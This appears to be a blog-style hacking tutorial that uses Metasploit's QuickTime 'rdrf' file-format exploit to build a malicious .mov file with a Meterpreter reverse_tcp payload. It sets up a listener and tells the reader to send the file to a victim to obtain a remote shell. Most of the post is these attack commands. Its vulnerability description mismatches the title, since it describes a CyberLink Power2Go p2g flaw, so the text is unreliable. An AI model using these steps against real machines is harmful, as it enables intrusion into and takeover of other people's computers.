Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows PC using Apple Quicktime 7 Invalid Atom Length Buffer Overflow

This module exploits a stack buffer overflow in Cyber Link Power2Go version 8.x the vulnerability is triggered when opening a malformed p2g file containing an overly long string in the ‘name’ attribute of the file element. This results in overwriting a structured exception handler record.

Exploit Targets

Apple Quicktime 7.7.3

Internet Explorer 8

Windows XP SP3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/apple_quicktime_rdrf

msf exploit (apple_quicktime_rdrf)>set payload windows/meterpreter/reverse_tcp

msf exploit (apple_quicktime_rdrf)>set lhost 192.168.1.6 (IP of Local Host)

msf exploit (apple_quicktime_rdrf)>exploit 

After we successfully generate the malicious mov File, it will stored on your local computer

/root/.msf4/local/msf.mov

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

exploit

Now send your msf.mov files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.